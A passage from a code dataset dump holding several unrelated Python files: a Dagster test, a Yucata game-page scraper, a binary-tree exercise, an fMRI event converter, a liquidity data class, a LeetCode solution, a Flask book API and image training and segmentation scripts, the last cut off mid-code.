5\n\n return [\n AssetsDefinition.from_op(\n _op,\n keys_by_input_name=cd.keys_by_input_name,\n keys_by_output_name=cd.keys_by_output_name,\n )\n for cd in data\n ]\n\n my_cacheable_assets_cool = MyCacheableAssets(\"foo\").with_attributes(\n group_names_by_key={AssetKey(\"foo\"): \"my_cool_group\"}\n )\n\n my_lame_group_sel = AssetSelection.groups(\"my_lame_group\")\n assert (\n len(\n my_lame_group_sel.resolve(\n my_cacheable_assets_cool.build_definitions(\n my_cacheable_assets_cool.compute_cacheable_data()\n )\n )\n )\n == 0\n )\n\n my_cool_group_sel = AssetSelection.groups(\"my_cool_group\")\n assert (\n len(\n my_cool_group_sel.resolve(\n my_cacheable_assets_cool.build_definitions(\n my_cacheable_assets_cool.compute_cacheable_data()\n )\n )\n )\n == 1\n )\n\n\ndef test_multiple_wrapped_cached_assets():\n \"\"\"Test that multiple wrappers (with_attributes, with_resources) work properly on cacheable assets.\"\"\"\n\n @resource\n def foo_resource():\n return 3\n\n my_cacheable_assets_with_group_and_asset = [\n x.with_attributes(\n output_asset_key_replacements={\n AssetKey(\"res_downstream\"): AssetKey(\"res_downstream_too\")\n }\n )\n for x in with_resources(\n [\n x.with_attributes(group_names_by_key={AssetKey(\"res_midstream\"): \"my_cool_group\"})\n for x in define_resource_dependent_cacheable_and_uncacheable_assets()\n ],\n {\"foo\": foo_resource},\n )\n ]\n\n @repository\n def resource_dependent_repo_with_resources():\n return [\n my_cacheable_assets_with_group_and_asset,\n define_asset_job(\n \"all_asset_job\",\n ),\n ]\n\n repo = resource_dependent_repo_with_resources.compute_repository_definition()\n assert isinstance(repo, RepositoryDefinition)\n assert isinstance(repo.get_job(\"all_asset_job\"), JobDefinition)\n\n my_cool_group_sel = AssetSelection.groups(\"my_cool_group\")\n assert (\n len(\n my_cool_group_sel.resolve(\n my_cacheable_assets_with_group_and_asset[0].build_definitions(\n my_cacheable_assets_with_group_and_asset[0].compute_cacheable_data()\n )\n + my_cacheable_assets_with_group_and_asset[1:]\n )\n )\n == 1\n )\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/dagster/dagster_tests/general_tests/test_pending_repository.py","file_name":"test_pending_repository.py","file_ext":"py","file_size_in_byte":10349,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"37041220579","text":"\"\"\"\n[Saint] Petersburg is one of the simplest games that I play regularly on Yucata.de, so we start\nthere. We already have code in the `slowgames` repo to rip the per-game webpages, which contain\nhistory in JavaScript\n\nWe need nomenclature to distingush between a \"game\" (an instance with an ID where I won or lost\nversus one or more specific opponents) and a game in the sense that Yucata added a new game or\nsomething is my favorite game, etc.\n\"\"\"\nimport os\nimport re\n\nimport requests\n\nclass GameDownloader(object):\n _downloads_games_root = os.path.join('..', 'downloads', 'games') \n \n def __init__(self, game_type='Petersburg'):\n self._game_type = game_type\n\n def save_all_games(self):\n \"\"\"For the game type in question, save the HTML from all game instances to the standard location.\n \n There are multiple strategies we could use:\n 1. Try all game numbers and see what game they resolve to. The lowest ID where \n this works is something between 6_250_000 and 6_500_000\n 2. Walk down the list of top players on a page like https://www.yucata.de/en/Ranking/Game/Petersburg . \n I have tried this, but these dynamic pages generally don't work well with my way of making requests.\n It's worth trying.\n \n Maybe more?\n \"\"\"\n \n # Can we get list of top players to work?\n url = f\"https://www.yucata.de/en/Ranking/Game/{self._game_type}\"\n response = requests.get(url)\n print(response.text)\n with open('temp_response.html', 'w') as thefile:\n thefile.write(response.text)\n \n def _html_for_id(self, game_id):\n url = f\"https://yucata.de/en/Game/{self._game_type}/{game_id}\"\n response = requests.get(url)\n return response.text\n \n def _request_top_players_anonymously(self):\n \"\"\"Adapted from legacy repo in site_yucata/classify_games.py . However, \n this can only get the top 10 for each game and hence may not be that valuable.\"\"\"\n url = 'https://yucata.de/de/GameInfo/' + self._game_type\n try:\n response = requests.get(url)\n except TimeoutError as e:\n raise YucataOSError(wrapped_error=e, game=self._game_type)\n lines = response.text.split(sep='background-color:white')\n patt = 'User/([a-zA-Z0-9 ]*)\"'\n return [re.search(patt, l).group(1) for l in lines if re.search(patt, l)]\n\n def _attempt_by_brute_force(self):\n \"\"\"The concept: Just go through each game number in a certain range and report if it's our desired game type.\n \n But it doesn't actually work if you're not logged in so never mind.\"\"\"\n for i in range(12_315_800, 12315900): # 12315875 is known to be Petersburg\n url = f\"https://www.yucata.de/de/Game/{self._game_type}/{i}\"\n print(url) # response = requests.get(url)\n # print(f\"{i}: {response.status_code}\")\n # with open(f\"temp-{i}.html\", 'w') as thefile:\n # thefile.write(response.text)\n\n \n\n \n \nif __name__ == \"__main__\":\n # GameDownloader().save_all_games()\n # print(GameDownloader()._request_top_players_anonymously())\n print(GameDownloader()._attempt_by_brute_force())","repo_name":"reed9999/langsam","sub_path":"game_downloader.py","file_name":"game_downloader.py","file_ext":"py","file_size_in_byte":3271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27459739211","text":"# BinaryTreeUsingLinkedList\n\nclass Node:\n def __init__(self, data):\n self.data = data\n self.next = None \n\nclass Queue:\n def __init__(self):\n self.head = None \n self.tail = None \n\n def isEmpty(self):\n return True if not self.head else False \n\n def create(self, data):\n if not self.head:\n print (\"The queue is not empty, need to call empty before create\")\n return \n node = Node(data)\n self.head = node\n self.tail = node \n\n def enqueue(self, data):\n # add at tail, remove at head \n node = Node(data)\n if self.isEmpty():\n self.head = node \n self.tail = node \n\n else:\n self.tail.next = node \n self.tail = node \n\n def dequeue(self):\n if self.isEmpty():\n return \"The queue is empty\"\n nodes = self.head\n if self.head == self.tail:\n self.head = None \n self.tail = None \n else:\n self.head = self.head.next \n return nodes \n\n\n\n# Create\nclass TreeNode:\n def __init__(self, data):\n self.data = data \n self.leftChild = None \n self.rightChild = None \n\n def __str__(self):\n level = 0 \n ret = \" \" * level + str(self.data) + \"\\n\"\n if self.leftChild:\n ret += \" \" * (level + 1) + self.leftChild.__str__()\n else:\n ret += \"\\n\"\n if self.rightChild:\n ret += \" \" * (level + 1) + self.rightChild.__str__()\n else:\n ret += \"\\n\"\n return ret \n\n \ntree = TreeNode(\"Drinks\")\n\nhot = TreeNode(\"Hot\")\ncold = TreeNode(\"Cold\")\n\ntea = TreeNode(\"Tea\")\n\ntree.leftChild = hot\ntree.rightChild = cold\nhot.leftChild = tea \n\n# print(tree)\n\ndef preOrderTraversal(rootNode): # time O(n), space O(n)\n if not rootNode:\n return \n print(rootNode.data)\n preOrderTraversal(rootNode.leftChild) # time O(n/2)\n preOrderTraversal(rootNode.rightChild) # time O(n/2)\n\n\n# preOrderTraversal(tree)\n\ndef inOrderTraversal(rootNode): # time O(n), space(n)\n if not rootNode:\n return \n inOrderTraversal(rootNode.leftChild) # time O(n/2)\n print(rootNode.data)\n inOrderTraversal(rootNode.rightChild) # time O(n/2)\n\n# inOrderTraversal(tree)\n\n\ndef postOrderTraversal(rootNode): # time O(n), space(n)\n if not rootNode:\n return \n postOrderTraversal(rootNode.leftChild) # time O(n/2)\n postOrderTraversal(rootNode.rightChild) # time O(n/2)\n print(rootNode.data)\n\n# postOrderTraversal(tree)\n\n\ndef levelOrderTraversal(rootNode):\n # need a queue\n if not rootNode:\n return \n q = Queue()\n q.enqueue(rootNode)\n while not q.isEmpty():\n node = q.dequeue()\n node = node.data\n print(node.data)\n if node.leftChild:\n q.enqueue(node.leftChild)\n if node.rightChild:\n q.enqueue(node.rightChild)\n\nlevelOrderTraversal(tree)\n\ndef searchANodeInBinaryTree(rootNode, data) -> bool:\n if not rootNode:\n print(\"The tree is empty\")\n return False \n \n q = Queue()\n q.enqueue(rootNode)\n while not q.isEmpty():\n node = q.dequeue()\n node = node.data\n if node.data == data:\n return True \n if node.leftChild:\n q.enqueue(node.leftChild)\n if node.rightChild:\n q.enqueue(node.rightChild)\n return False \n\nprint(searchANodeInBinaryTree(tree, \"Tea\"))\n\n\ndef insertNodeBT(rootNode, newNode):\n if not rootNode:\n rootNode = newNode \n else:\n q = Queue()\n q.enqueue(rootNode)\n while not q.isEmpty():\n treeNode = q.dequeue()\n treeNode = treeNode.data \n if not treeNode.leftChild:\n treeNode.leftChild = newNode\n break \n q.enqueue(treeNode.leftChild)\n if not treeNode.rightChild:\n treeNode.rightChild = newNode\n break\n q.enqueue(treeNode.rightChild)\n print(\"Insert successfully\")\n\n\ncolar = TreeNode(\"Colar\")\ninsertNodeBT(tree, colar)\nlevelOrderTraversal(tree)\n\ndef getDeepestNode(rootNode):\n if not rootNode:\n return None \n q = Queue()\n q.enqueue(rootNode)\n while not q.isEmpty():\n treeNode = q.dequeue()\n treeNode = treeNode.data\n if treeNode.leftChild:\n q.enqueue(treeNode.leftChild)\n if treeNode.rightChild:\n q.enqueue(treeNode.rightChild)\n\n return treeNode \n\n\ndef deleteNodeBT(rootNode, data):\n if not rootNode:\n return \"The tree is empty\"\n \n if not rootNode.leftChild and not rootNode.rightChild:\n if rootNode.data == data:\n rootNode = None \n return \"Delete node successfully\"\n else:\n return \"There is no such node in the tree\"\n\n deepestTreeNode = getDeepestNode(rootNode)\n\n q = Queue()\n q.enqueue(rootNode)\n while not q.isEmpty():\n treeNode = q.dequeue()\n treeNode = treeNode.data\n\n if treeNode.leftChild and treeNode.leftChild.data == data:\n treeNode.leftChild.data = deepestTreeNode.data \n # deepestTreeNode = None # can't do this way\n deleteDeepestNode(rootNode)\n return \"Delete node successfully\"\n elif treeNode.leftChild:\n q.enqueue(treeNode.leftChild)\n \n if treeNode.rightChild and treeNode.rightChild.data == data:\n treeNode.rightChild.data = deepestTreeNode.data \n # deepestTreeNode = None # can't do this way\n deleteDeepestNode(rootNode)\n return \"Delete node successfully\"\n elif treeNode.rightChild:\n q.enqueue(treeNode.rightChild)\n\n return \"There is no such node in the tree\"\n\n\n\ndef deleteDeepestNode(rootNode): # bugs: how about rootNode itself if the deepest node?\n if not rootNode:\n return \n deepestNode = getDeepestNode(rootNode) # return by ref\n q = Queue()\n q.enqueue(rootNode)\n while not q.isEmpty():\n treeNode = q.dequeue().data \n if treeNode.leftChild is deepestNode:\n treeNode.leftChild = None \n return \n if treeNode.rightChild is deepestNode:\n treeNode.rightChild = None \n return \n \n if treeNode.leftChild:\n q.enqueue(treeNode.leftChild)\n if treeNode.rightChild:\n q.enqueue(treeNode.rightChild)\n\n\ndef deleteBT(rootNode):\n if not rootNode:\n return \"The tree is deleted already\"\n\n rootNode.data = None \n rootNode.leftChild = None \n rootNode.rightChild = None \n return \"The tree is deleted successfully\"\n\n\ntree = TreeNode(\"Drinks\")\nlevelOrderTraversal(tree)\nprint(\"---------------------\")\n# deleteDeepestNode(tree)\nprint(deleteNodeBT(tree, \"Drinks\"))\n\nlevelOrderTraversal(tree)\n# deleteBT(tree)\n# levelOrderTraversal(tree)\n\n\n \n \n\n\n\n\n \n\n","repo_name":"chen-qian-dan/Algorithms_And_Data_Structures_20211227Mon","sub_path":"08-Tree/BinaryTreeUsingLinkedList.py","file_name":"BinaryTreeUsingLinkedList.py","file_ext":"py","file_size_in_byte":6914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74095219689","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# Authors: Daniel van de Velden (d.vandevelden@yahoo.de)\n#\n# License: BSD (3-clause)\n\nimport numpy as np\nimport pandas as pd\nimport os\nimport csv\nimport glob\nimport zipfile\nfrom dv_code.scripts.misc import read_analysis_params \n\ndef extract_events_csv(fname_evt=None, subjID=None, ses=None, params=None):\n\n fdir_evt_src = os.path.dirname(fname_evt)\n fileexts = ['.zip'] # ['.tar.gz', '.bz2', '.zip']\n for ext in fileexts:\n if fname_evt.endswith(ext):\n print ('The file: ', fname_evt, ' has the extension: ', ext)\n \n print(f'# Unpacking: {fname_evt}')\n with zipfile.ZipFile(fname_evt,\"r\") as zip_ref:\n fname_inside_evt = fdir_evt_src + '/' + zip_ref.filelist[0].filename\n zip_ref.extractall(fdir_evt_src)\n print('done...\\n')\n \n tmp_csv = []\n tmp_trash = []\n for jtem in zip_ref.filelist:\n tmp_jtem = fdir_evt_src + '/' + jtem.filename\n if '.csv' in tmp_jtem:\n tmp_csv.append(fdir_evt_src + '/' + jtem.filename)\n else:\n tmp_trash.append(fdir_evt_src + '/' + jtem.filename)\n \n for jtem in tmp_trash:\n os.remove(jtem)\n \n fname_evt_ = tmp_csv[0]\n df = pd.read_csv(fname_evt_)\n \n # extract the relevant input\n df_relevant = df[['type','text_welcome.started', 'image_1.started', 'duration_null_event']]\n \n N_stims = df_relevant.shape[0]\n N_runs = round( N_stims / 24 )\n tsv_header_name = ['onset', 'duration', 'trial_type']\n \n fdir_subjBIDS = params.get('fdir_data') + '/' + subjID + '/' + ses + '/func/'\n \n for i_run in np.arange(N_runs):\n \n dat_w_event_tsv = []\n fname_w_tsv = fdir_subjBIDS + subjID + '_' + ses + '_run-0' + (str(i_run+1)) + '_bold.tsv'\n for i_stim in range((i_run) * 24, (i_run + 1) * 24, 1):\n \n if i_run == 0:\n run_offset = df_relevant['text_welcome.started'][i_run * 24]\n else:\n run_offset = df_relevant['image_1.started'][i_run * 24] -10\n\n \n item_onset = (df_relevant['image_1.started'][i_stim] - run_offset)\n item_onset_ = str(round(item_onset, 4))\n item_trial_type = df_relevant['type'][i_stim]\n dat_w_event_tsv.append([item_onset_, '4', item_trial_type])\n \n item_onset_null = str(round(item_onset+4, 4))\n item_null_dur_ = str( df_relevant['duration_null_event'][i_stim] )\n dat_w_event_tsv.append([item_onset_null, item_null_dur_, 'null_event'])\n \n with open(fname_w_tsv, 'w') as tsvfile: #csv writer to write in tsv file\n tsv_writer = csv.writer(tsvfile, delimiter='\\t') #write header in tsv file\n tsv_writer.writerow(tsv_header_name) #write rows\n tsv_writer.writerows(dat_w_event_tsv) #close csv file\n tsvfile.close()\n \n \n fname_w_tsv = fdir_subjBIDS + subjID[1] + '_' + ses + '_run-99_bold.tsv'\n dat_w_event_tsv = []\n pass_run_time = 0\n for i_run in np.arange(N_runs):\n \n for i_stim in range((i_run) * 24, (i_run + 1) * 24, 1):\n \n run_offset = df_relevant['text_welcome.started'][i_run * 24]\n\n item_onset = (df_relevant['image_1.started'][i_stim] - run_offset + pass_run_time)\n item_onset_ = str(round(item_onset, 4))\n item_trial_type = df_relevant['type'][i_stim]\n dat_w_event_tsv.append([item_onset_, '4', item_trial_type])\n \n item_onset_null = str(round(item_onset+4, 4))\n item_null_dur_ = str( df_relevant['duration_null_event'][i_stim] )\n dat_w_event_tsv.append([item_onset_null, item_null_dur_, 'null_event'])\n \n \n item_onset_welcome = str((float(item_onset_null) + float(item_null_dur_)))\n item_welcome_dur_ = str( 10 )\n dat_w_event_tsv.append([item_onset_welcome, item_welcome_dur_, 'welcome_'])\n pass_run_time = float(item_onset_welcome) + float(item_welcome_dur_)\n \n with open(fname_w_tsv, 'w') as tsvfile: #csv writer to write in tsv file\n tsv_writer = csv.writer(tsvfile, delimiter='\\t') #write header in tsv file\n tsv_writer.writerow(tsv_header_name) #write rows\n tsv_writer.writerows(dat_w_event_tsv) #close csv file\n tsvfile.close()\n \n return","repo_name":"d-van-de-velden/dv_code","sub_path":"scripts/preprocessing/func_extract_evts.py","file_name":"func_extract_evts.py","file_ext":"py","file_size_in_byte":4624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42156468085","text":"\"\"\"Liquidity data feed manipulation.\n\nFor more information about liquidity in automatic market making pools see :term:`AMM`\nand :term:`XY liquidity model`.\n\"\"\"\n\nimport datetime\nfrom dataclasses import dataclass\nfrom typing import List, Optional, Iterable, Tuple\n\nimport pandas as pd\nimport pyarrow as pa\nfrom dataclasses_json import dataclass_json\nfrom pandas.core.groupby import GroupBy\n\nfrom tradingstrategy.types import UNIXTimestamp, USDollarAmount, BlockNumber, PrimaryKey\nfrom tradingstrategy.utils.groupeduniverse import PairGroupedUniverse\n\n\nclass LiquidityDataUnavailable(Exception):\n \"\"\"We tried to look up liquidity info for a trading pair, but count not find a sample.\"\"\"\n\n\n@dataclass_json\n@dataclass\nclass XYLiquidity:\n \"\"\"Data structure that presents liquidity status in bonding curve pool.\n\n This data structure is for naive x*y=k :term:`AMM` pool.\n Liquidity is not the part of the normal :term:`technical analysis`,\n so the dataset server has separate datasets for it.\n\n Liquidity is expressed as US dollar value of the :term:`quote token` of the pool.\n For example if the pool is 50 $FOO in reserve0 and 50 $USDC in reserve1, the\n liquidity of the pool would be expressed as 50 USD.\n\n Liquidity events, like :term:`candles <candle>`, have open, high, low and close values,\n depending on which time of the candle they were sampled.\n \"\"\"\n\n #: Primary key to identity the trading pair\n #: Use pair universe to map this to chain id and a smart contract address\n pair_id: PrimaryKey\n\n #: Open timestamp for this time bucket.\n timestamp: UNIXTimestamp\n\n #: USD exchange rate of the quote token used to\n #: convert to dollar amounts in this time bucket.\n #:\n #: Note that currently any USD stablecoin (USDC, DAI) is\n #: assumed to be 1:1 and the candle server cannot\n #: handle exchange rate difference among stablecoins.\n #:\n #: The rate is taken at the beginning of the 1 minute time bucket.\n #: For other time buckets, the exchange rate is the simple average\n #: for the duration of the bucket.\n exchange_rate: float\n\n #: Liquidity absolute values in the pool in different time points.\n #: Note - for minute candles - if the candle contains only one event (mint, burn, sync)\n #: the open liquidity value is the value AFTER this event.\n #: The dataset server does not track the closing value of the previous liquidity event.\n #: This applies for minute candles only.\n open: USDollarAmount\n\n #: Liquidity absolute values in the pool in different time points\n close: USDollarAmount\n\n #: Liquidity absolute values in the pool in different time points\n high: USDollarAmount\n\n #: Liquidity absolute values in the pool in different time points\n low: USDollarAmount\n\n #: Number of liquidity supplied events for pool\n adds: int\n\n #: Number of liquidity removed events for the pool\n removes: int\n\n #: Number of total events affecting liquidity during the time window.\n #: This is adds, removes AND swaps AND sync().\n syncs: int\n\n #: How much new liquidity was supplied, in the terms of the quote token converted to US dollar\n add_volume: USDollarAmount\n\n #: How much new liquidity was removed, in the terms of the quote token converted to US dollar\n add_volume: USDollarAmount\n\n #: Blockchain tracking information\n start_block: BlockNumber\n\n #: Blockchain tracking information\n end_block: BlockNumber\n\n def __repr__(self):\n human_timestamp = datetime.datetime.utcfromtimestamp(self.timestamp)\n return f\"@{human_timestamp} O:{self.open} H:{self.high} L:{self.low} C:{self.close} V:{self.volume} A:{self.adds} R:{self.removes} SB:{self.start_block} EB:{self.end_block}\"\n\n @classmethod\n def to_pyarrow_schema(cls, small_candles=False) -> pa.Schema:\n \"\"\"Construct schema for writing Parquet filess for these candles.\n\n :param small_candles: Use even smaller word sizes for frequent (1m) candles.\n \"\"\"\n schema = pa.schema([\n (\"pair_id\", pa.uint32()),\n (\"timestamp\", pa.timestamp(\"s\")),\n (\"exchange_rate\", pa.float32()),\n (\"open\", pa.float32()),\n (\"close\", pa.float32()),\n (\"high\", pa.float32()),\n (\"low\", pa.float32()),\n (\"adds\", pa.uint16() if small_candles else pa.uint32()),\n (\"removes\", pa.uint16() if small_candles else pa.uint32()),\n (\"syncs\", pa.uint16() if small_candles else pa.uint32()),\n (\"add_volume\", pa.float32()),\n (\"remove_volume\", pa.float32()),\n (\"start_block\", pa.uint32()), # Should we good for 4B blocks\n (\"end_block\", pa.uint32()),\n ])\n return schema\n\n @classmethod\n def to_dataframe(cls) -> pd.DataFrame:\n \"\"\"Return emptry Pandas dataframe presenting liquidity sample.\"\"\"\n\n # TODO: Does not match the spec 1:1 - but only used as empty in tests\n fields = dict([\n (\"pair_id\", \"int\"),\n (\"timestamp\", \"datetime64[s]\"),\n (\"exchange_rate\", \"float\"),\n (\"open\", \"float\"),\n (\"close\", \"float\"),\n (\"high\", \"float\"),\n (\"low\", \"float\"),\n (\"buys\", \"float\"),\n (\"sells\", \"float\"),\n (\"add_volume\", \"float\"),\n (\"remove_volume\", \"float\"),\n (\"start_block\", \"float\"),\n (\"end_block\", \"float\"),\n ])\n df = pd.DataFrame(columns=fields.keys())\n return df.astype(fields)\n\n\n@dataclass_json\n@dataclass\nclass LiquidityResult:\n \"\"\"Server-reply for live queried liquidity data.\"\"\"\n\n #: A bunch of candles.\n #: Candles are unordered and subject to client side sorting.\n #: Multiple pairs and chains may be present in candles.\n liquidity_events: List[XYLiquidity]\n\n def sort_by_timestamp(self):\n \"\"\"In-place sorting of candles by their timestamp.\"\"\"\n self.candles.sort(key=lambda c: c.timestamp)\n\n\nclass GroupedLiquidityUniverse(PairGroupedUniverse):\n \"\"\"A universe where each trading pair has its own liquidity data feed.\n\n This is helper class to create foundation for multi pair strategies.\n\n For the data logistics purposes, all candles are lumped together in single columnar data blobs.\n However, it rarely makes sense to execute operations over different trading pairs.\n :py:class`GroupedLiquidityUniverse` creates trading pair id -> liquidity sample data grouping out from\n raw liquidity sample.\n \"\"\"\n\n def get_liquidity_samples_by_pair(self, pair_id: PrimaryKey) -> Optional[pd.DataFrame]:\n \"\"\"Get samples for a single pair.\n\n If the pair does not exist return `None`.\n \"\"\"\n try:\n return self.get_samples_by_pair(pair_id)\n except KeyError:\n return None\n\n def get_closest_liquidity(self, pair_id: PrimaryKey, when: pd.Timestamp, kind=\"open\", look_back_time_frames=5) -> USDollarAmount:\n \"\"\"Get the available liuqidity for a trading pair at a specific timepoint or some candles before the timepoint.\n\n The liquidity is defined as one-sided as in :term:`XY liquidity model`.\n\n :param pair_id: Traing pair id\n :param when: Timestamp to query\n :param kind: One of liquidity samples: \"open\", \"close\", \"low\", \"high\"\n :param look_back_timeframes: If there is no liquidity sample available at the exact timepoint,\n look to the past to the get the nearest sample\n :return: We always return\n :raise LiquidityDataUnavailable: There was no liquidity sample available\n \"\"\"\n\n assert kind in (\"open\", \"close\", \"high\", \"low\"), f\"Got kind: {kind}\"\n\n start_when = when\n samples_per_pair = self.get_liquidity_samples_by_pair(pair_id)\n assert samples_per_pair is not None, f\"No liquidity data available for pair {pair_id}\"\n\n samples_per_kind = samples_per_pair[kind]\n for attempt in range(look_back_time_frames):\n try:\n sample = samples_per_kind[when]\n return sample\n except KeyError:\n # Go to the previous sample\n when -= self.time_bucket.to_timedelta()\n\n raise LiquidityDataUnavailable(f\"Could not find any liquidity samples for pair {pair_id} between {when} - {start_when}\")\n\n @staticmethod\n def create_empty() -> \"GroupedLiquidityUniverse\":\n \"\"\"Create a liquidity universe without any data.\"\"\"\n return GroupedLiquidityUniverse(df=XYLiquidity.to_dataframe(), index_automatically=False)\n","repo_name":"cjelsa/trading-strategy","sub_path":"tradingstrategy/liquidity.py","file_name":"liquidity.py","file_ext":"py","file_size_in_byte":8579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"641746613","text":"'''\n17. Letter Combinations of a Phone Number\nhttps://leetcode.com/problems/letter-combinations-of-a-phone-number/\n'''\n\n\nclass Solution:\n def letterCombinations(self, digits: str) -> List[str]:\n if digits == \"\":\n return []\n \n digit_map = {\n '2': 'abc',\n '3': 'def',\n '4': 'ghi',\n '5': 'jkl',\n '6': 'mno',\n '7': 'pqrs',\n '8': 'tuv',\n '9': 'wxyz'\n }\n \n def backtrack(curr):\n if len(curr) == len(digits):\n ans.append(''.join(curr))\n return\n for c in digit_map[digits[len(curr)]]:\n curr.append(c)\n backtrack(curr)\n curr.pop()\n \n ans = []\n backtrack([])\n return ans ","repo_name":"supawichable/leetcode","sub_path":"0017_letter_combinations_of_a_phone_numeber.py","file_name":"0017_letter_combinations_of_a_phone_numeber.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44898317835","text":"\"\"\"\r\nAuthor: Phuc Tran\r\nApp Name: APIs\r\nPurpose: Create APIs for Web\r\n\"\"\"\r\n\r\nfrom flask import Flask, request\r\nfrom flask_sqlalchemy import SQLAlchemy\r\n\r\napp = Flask(__name__)\r\napp.config[\"SQLALCHEMY_DATABASE_URI\"] = \"sqlite:///book_data.db\"\r\napp.config[\"SQLALCHEMY_TRACK_MODIFICATIONS\"] = False\r\ndb = SQLAlchemy(app)\r\n\r\n\r\nclass Book(db.Model):\r\n id = db.Column(db.Integer,\r\n primary_key=True)\r\n book_name = db.Column(db.String(100),\r\n unique=True,\r\n nullable=False)\r\n author = db.Column(db.String(50),\r\n nullable=False)\r\n publisher = db.Column(db.String(50),\r\n nullable=False)\r\n\r\n def __repr__(self):\r\n return f\"{self.book_name} by {self.author}, published by {self.publisher}\"\r\n\r\ndef init_db():\r\n db.create_all()\r\n book = Book(book_name=\"name\", author=\"author\", publisher=\"publisher\")\r\n db.session.add(book)\r\n db.session.commit()\r\n\r\n@app.route(\"/\")\r\ndef welcome():\r\n return \"Website Provide Book's Information!!!\"\r\n\r\n@app.route(\"/books\")\r\ndef get_books():\r\n books = Book.query.all()\r\n output = []\r\n\r\n for book in books:\r\n book_info = {\"name\": book.book_name,\r\n \"author\": book.author,\r\n \"publisher\": book.publisher}\r\n output.append(book_info)\r\n\r\n return {\"books\": output}\r\n\r\n@app.route(\"/books/<id>\")\r\ndef get_book(id):\r\n book = Book.query.get_or_404(id)\r\n return {\"name\": book.book_name,\r\n \"author\": book.author,\r\n \"publisher\": book.publisher}\r\n\r\n@app.route(\"/books\", methods=[\"POST\"])\r\ndef add_book():\r\n book = Book(book_name=request.json[\"name\"],\r\n author=request.json[\"author\"],\r\n publisher=request.json[\"publisher\"])\r\n db.session.add(book)\r\n db.session.commit()\r\n return {\"id\": book.id}\r\n\r\n@app.route(\"/books/<id>\", methods=[\"DELETE\"])\r\ndef del_book(id):\r\n book = Book.query.get(id)\r\n if book is None:\r\n return {\"error\": \"not found\"}\r\n db.session.delete(book)\r\n db.session.commit()\r\n return {\"message\": \"Completed!!!\"}\r\n\r\n\r\nif __name__ == \"__main__\":\r\n init_db()\r\n","repo_name":"htp1988/SDEV220","sub_path":"M04Lab_CaseStudy.py","file_name":"M04Lab_CaseStudy.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23726667457","text":"# -*- coding=utf-8 -*-\nimport os\nimport sys\nimport pickle\nimport numpy as np\n\nimport resnet\nfrom image_set import ImageSet, CacheMode\nfrom learning_bot import LearningBot, DrawMethod\n\ndef main():\n image_set = ImageSet.load(sys.argv[1], 240, 320)\n image_set.split(train_rate=0.9, seed=\"numazu_shine\")\n \n model = resnet.ResnetBuilder.build_resnet_18(\n (image_set.color, image_set.height, image_set.width), image_set.num_classes)\n model.summary()\n bot = LearningBot(model)\n\n history = {}\n for image_data in image_set.get_iter_for_learning_curve(5):\n size = len(image_data[0])\n \n datagen = image.ImageDataGenerator(\n zca_whitening=True,\n rotation_range=10,\n width_shift_range=0.2,\n height_shift_range=0.2,\n shear_range=0.5,\n zoom_range=0.3,\n channel_shift_range=0.,\n horizontal_flip=True)\n datagen.fit(image_data[0])\n\n history[size] = bot.learn_by_generator(*image_data, datagen, batch_size=128, steps_per_epoch=size/128 )\n\n bot.draw_history_list('test.png', history, [\"acc\", \"val_acc\"], method=DrawMethod.best)\n\nif __name__ == \"__main__\":\n main()","repo_name":"ousquid/numazu-shine","sub_path":"numazu_shine.py","file_name":"numazu_shine.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6888924544","text":"import numpy as np\nimport cv2\nfrom matplotlib import pyplot as plt\nimport os\nfrom os import listdir\n\n\ndef is_image(file_name):\n file_extension = file_name.split('.')[-1]\n if file_extension in ('jpg', 'JPG', 'jpeg', 'JPEG', 'tif', 'TIF', 'png', 'PNG', 'bmp', 'BMP'):\n return True\n else:\n return False\n\n\n# https://docs.opencv.org/3.3.0/d5/df0/group__ximgproc__segmentation.html#ga5e3e721c5f16e34d3ad52b9eeb6d2860\nclass Segmentator:\n def __init__(\n self,\n contrast_alpha=1.5,\n contrast_beta=-100,\n mean_filtering_sp=7,\n mean_filtering_sr=25,\n mean_filtering_level=0,\n segmentation_sigma=0.8,\n segmentation_k=600,\n segmentation_min=1\n ):\n self.contrast_alpha = contrast_alpha\n self.contrast_beta = contrast_beta\n\n self.mean_filtering_sp = mean_filtering_sp\n self.mean_filtering_sr = mean_filtering_sr\n self.mean_filtering_level = mean_filtering_level\n\n self.segmentation_sigma = segmentation_sigma\n self.segmentation_k = segmentation_k\n self.segmentation_min = segmentation_min\n\n cv2.setUseOptimized(True)\n cv2.setNumThreads(16)\n\n def folder_segmentation(self, folder_path, result_path=None, start=0, show_result=False):\n result = list()\n files = listdir(folder_path)\n n_files = len(files)\n for idx, file in enumerate(files):\n if idx < start:\n continue\n if is_image(file):\n print('%s Completed [%d/%d]' % (file, n_files, idx + 1))\n result.append(\n self.file_segmentation(\n img_path=folder_path + '/' + file,\n show_result=show_result\n )\n )\n if result_path is not None:\n if not os.path.exists(result_path):\n os.makedirs(result_path)\n plt.imsave(result_path + '/' + file, result[-1])\n\n return result\n\n def file_segmentation(self, img_path, show_result=False):\n img = np.array(\n plt.imread(img_path)[1504:1604, 380:1920 - 380, :]\n )\n return self.segmentation(\n img=img,\n img_name=img_path.split('/')[-1],\n show_result=show_result\n )\n\n def segmentation(self, img, img_name='Original', show_result=False):\n # Remove boundary data\n img_mask = np.array(img >= 20).astype(dtype=np.uint8)\n img_h = img.shape[0]\n img_w = img.shape[1]\n\n # Adjust contrast of image\n alpha = self.contrast_alpha\n beta = self.contrast_beta\n img_contrast = img * alpha + beta\n img_contrast = np.clip(img_contrast, 0, 255).astype(dtype=np.uint8)\n\n # Apply mean filtering to image\n mean_filtering = 